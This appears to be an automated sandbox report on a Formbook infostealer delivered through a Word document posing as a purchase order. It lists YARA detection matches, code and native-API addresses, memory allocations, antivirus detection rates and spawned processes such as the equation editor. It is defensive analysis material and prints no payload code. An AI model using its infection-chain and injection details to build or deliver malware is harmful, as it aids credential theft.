Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.438341359.0000000003221000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.469103907.0000000009613000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.476999679.00000000000F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.687654604.00000000000A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.477135735.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Detected potential crypto function

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_003969C9		4_2_003969C9
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_00396D30		4_2_00396D30
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_003990B0		4_2_003990B0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_0039B381		4_2_0039B381
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_020B5B90		4_2_020B5B90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_020B0048		4_2_020B0048
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 4_2_003900F0		4_2_003900F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0040102E		5_2_0040102E
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00401030		5_2_00401030
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041DAD8		5_2_0041DAD8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041ED7F		5_2_0041ED7F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00402D87		5_2_00402D87
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00402D90		5_2_00402D90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00409E50		5_2_00409E50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041D630		5_2_0041D630
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00402FB0		5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CBE0C6		5_2_00CBE0C6
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC3040		5_2_00CC3040
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CD905A		5_2_00CD905A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CED005		5_2_00CED005
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CBE2E9		5_2_00CBE2E9
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D61238		5_2_00D61238
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CBF3CF		5_2_00CBF3CF
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CE63DB		5_2_00CE63DB
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC7353		5_2_00CC7353
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D0A37B		5_2_00D0A37B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC2305		5_2_00CC2305
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CD1489		5_2_00CD1489
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CF5485		5_2_00CF5485
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CDC5F0		5_2_00CDC5F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC351F		5_2_00CC351F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CCE6C1		5_2_00CCE6C1
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC4680		5_2_00CC4680
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D62622		5_2_00D62622
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CF57C3		5_2_00CF57C3
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D4579A		5_2_00D4579A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CCC7BC		5_2_00CCC7BC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D5F8EE		5_2_00D5F8EE
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CCC85C		5_2_00CCC85C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CE286D		5_2_00CE286D
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CD69FE		5_2_00CD69FE
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D6098E		5_2_00D6098E
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CC29B2		5_2_00CC29B2
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D45955		5_2_00D45955
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D73A83		5_2_00D73A83
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D4DBDA		5_2_00D4DBDA
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CBFBD7		5_2_00CBFBD7
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D6CBA4		5_2_00D6CBA4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CE7B00		5_2_00CE7B00
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00D5FDDD		5_2_00D5FDDD
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CCCD5B		5_2_00CCCD5B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CF0D3B		5_2_00CF0D3B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CDEE4C		5_2_00CDEE4C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CF2E2F		5_2_00CF2E2F
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CEDF7C		5_2_00CEDF7C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CD0F3F		5_2_00CD0F3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024A1238		7_2_024A1238
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023FE2E9		7_2_023FE2E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02407353		7_2_02407353
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0244A37B		7_2_0244A37B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02402305		7_2_02402305
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024263DB		7_2_024263DB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023FF3CF		7_2_023FF3CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02403040		7_2_02403040
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0241905A		7_2_0241905A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0242D005		7_2_0242D005
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023FE0C6		7_2_023FE0C6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024A2622		7_2_024A2622
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0240E6C1		7_2_0240E6C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02404680		7_2_02404680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024357C3		7_2_024357C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0248579A		7_2_0248579A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0240C7BC		7_2_0240C7BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02435485		7_2_02435485
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02411489		7_2_02411489
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0240351F		7_2_0240351F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0241C5F0		7_2_0241C5F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024B3A83		7_2_024B3A83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02427B00		7_2_02427B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0248DBDA		7_2_0248DBDA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023FFBD7		7_2_023FFBD7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024ACBA4		7_2_024ACBA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0240C85C		7_2_0240C85C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0242286D		7_2_0242286D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0249F8EE		7_2_0249F8EE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02485955		7_2_02485955
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024169FE		7_2_024169FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024A098E		7_2_024A098E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_024029B2		7_2_024029B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0241EE4C		7_2_0241EE4C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02432E2F		7_2_02432E2F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0242DF7C		7_2_0242DF7C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02410F3F		7_2_02410F3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0240CD5B		7_2_0240CD5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02430D3B		7_2_02430D3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0249FDDD		7_2_0249FDDD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BD630		7_2_000BD630
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BED7F		7_2_000BED7F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000A2D87		7_2_000A2D87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000A2D90		7_2_000A2D90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000A9E50		7_2_000A9E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000A2FB0		7_2_000A2FB0

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 023FDF5C appears 107 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 02443F92 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0244373B appears 238 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 0246F970 appears 81 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 023FE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: String function: 00D03F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: String function: 00D0373B appears 238 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: String function: 00CBE2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: String function: 00D2F970 appears 81 times
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: String function: 00CBDF5C appears 105 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A350 NtCreateFile,		5_2_0041A350
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A400 NtReadFile,		5_2_0041A400
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A480 NtClose,		5_2_0041A480
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A530 NtAllocateVirtualMemory,		5_2_0041A530
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A30A NtCreateFile,		5_2_0041A30A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A3FD NtReadFile,		5_2_0041A3FD
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A47A NtClose,		5_2_0041A47A
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_0041A52B NtAllocateVirtualMemory,		5_2_0041A52B
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB00C4 NtCreateFile,LdrInitializeThunk,		5_2_00CB00C4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB0048 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_00CB0048
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB0078 NtResumeThread,LdrInitializeThunk,		5_2_00CB0078
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAF9F0 NtClose,LdrInitializeThunk,		5_2_00CAF9F0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAF900 NtReadFile,LdrInitializeThunk,		5_2_00CAF900
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_00CAFAD0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFAE8 NtQueryInformationProcess,LdrInitializeThunk,		5_2_00CAFAE8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFBB8 NtQueryInformationToken,LdrInitializeThunk,		5_2_00CAFBB8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFB68 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_00CAFB68
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFC90 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_00CAFC90
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFC60 NtMapViewOfSection,LdrInitializeThunk,		5_2_00CAFC60
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFDC0 NtQuerySystemInformation,LdrInitializeThunk,		5_2_00CAFDC0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFD8C NtDelayExecution,LdrInitializeThunk,		5_2_00CAFD8C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_00CAFED0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFEA0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_00CAFEA0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFFB4 NtCreateSection,LdrInitializeThunk,		5_2_00CAFFB4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB10D0 NtOpenProcessToken,		5_2_00CB10D0
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB0060 NtQuerySection,		5_2_00CB0060
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB01D4 NtSetValueKey,		5_2_00CB01D4
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB1148 NtOpenThread,		5_2_00CB1148
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB010C NtOpenDirectoryObject,		5_2_00CB010C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB07AC NtCreateMutant,		5_2_00CB07AC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAF8CC NtWaitForSingleObject,		5_2_00CAF8CC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAF938 NtWriteFile,		5_2_00CAF938
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB1930 NtSetContextThread,		5_2_00CB1930
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFAB8 NtQueryValueKey,		5_2_00CAFAB8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFA50 NtEnumerateValueKey,		5_2_00CAFA50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFA20 NtQueryInformationFile,		5_2_00CAFA20
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFBE8 NtQueryVirtualMemory,		5_2_00CAFBE8
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFB50 NtCreateKey,		5_2_00CAFB50
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFC48 NtSetInformationFile,		5_2_00CAFC48
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB0C40 NtGetContextThread,		5_2_00CB0C40
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFC30 NtOpenProcess,		5_2_00CAFC30
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CB1D80 NtSuspendThread,		5_2_00CB1D80
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFD5C NtEnumerateKey,		5_2_00CAFD5C
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFE24 NtWriteVirtualMemory,		5_2_00CAFE24
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFFFC NtCreateProcessEx,		5_2_00CAFFFC
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Code function: 5_2_00CAFF34 NtQueueApcThread,		5_2_00CAFF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F00C4 NtCreateFile,LdrInitializeThunk,		7_2_023F00C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F07AC NtCreateMutant,LdrInitializeThunk,		7_2_023F07AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFAB8 NtQueryValueKey,LdrInitializeThunk,		7_2_023EFAB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFAE8 NtQueryInformationProcess,LdrInitializeThunk,		7_2_023EFAE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,		7_2_023EFAD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFB68 NtFreeVirtualMemory,LdrInitializeThunk,		7_2_023EFB68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFB50 NtCreateKey,LdrInitializeThunk,		7_2_023EFB50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFBB8 NtQueryInformationToken,LdrInitializeThunk,		7_2_023EFBB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EF900 NtReadFile,LdrInitializeThunk,		7_2_023EF900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EF9F0 NtClose,LdrInitializeThunk,		7_2_023EF9F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,		7_2_023EFED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFFB4 NtCreateSection,LdrInitializeThunk,		7_2_023EFFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFC60 NtMapViewOfSection,LdrInitializeThunk,		7_2_023EFC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFD8C NtDelayExecution,LdrInitializeThunk,		7_2_023EFD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFDC0 NtQuerySystemInformation,LdrInitializeThunk,		7_2_023EFDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F0078 NtResumeThread,		7_2_023F0078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F0060 NtQuerySection,		7_2_023F0060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F0048 NtProtectVirtualMemory,		7_2_023F0048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F10D0 NtOpenProcessToken,		7_2_023F10D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F010C NtOpenDirectoryObject,		7_2_023F010C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F1148 NtOpenThread,		7_2_023F1148
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F01D4 NtSetValueKey,		7_2_023F01D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFA20 NtQueryInformationFile,		7_2_023EFA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFA50 NtEnumerateValueKey,		7_2_023EFA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFBE8 NtQueryVirtualMemory,		7_2_023EFBE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EF8CC NtWaitForSingleObject,		7_2_023EF8CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EF938 NtWriteFile,		7_2_023EF938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F1930 NtSetContextThread,		7_2_023F1930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFE24 NtWriteVirtualMemory,		7_2_023EFE24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFEA0 NtReadVirtualMemory,		7_2_023EFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFF34 NtQueueApcThread,		7_2_023EFF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFFFC NtCreateProcessEx,		7_2_023EFFFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFC30 NtOpenProcess,		7_2_023EFC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFC48 NtSetInformationFile,		7_2_023EFC48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F0C40 NtGetContextThread,		7_2_023F0C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFC90 NtUnmapViewOfSection,		7_2_023EFC90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023EFD5C NtEnumerateKey,		7_2_023EFD5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_023F1D80 NtSuspendThread,		7_2_023F1D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA350 NtCreateFile,		7_2_000BA350
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA400 NtReadFile,		7_2_000BA400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA480 NtClose,		7_2_000BA480
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA530 NtAllocateVirtualMemory,		7_2_000BA530
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA30A NtCreateFile,		7_2_000BA30A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA3FD NtReadFile,		7_2_000BA3FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA47A NtClose,		7_2_000BA47A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_000BA52B NtAllocateVirtualMemory,		7_2_000BA52B

PE file contains strange resources

Source: harshmanzx[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hasmenhtk721.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Sample is known by Antivirus

Source: RFQ9003930 New Order.doc	Virustotal: Detection: 28%
Source: RFQ9003930 New Order.doc	ReversingLabs: Detection: 28%

Reads software policies

Source: C:\Users\user\AppData\Roaming\hasmenhtk721.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
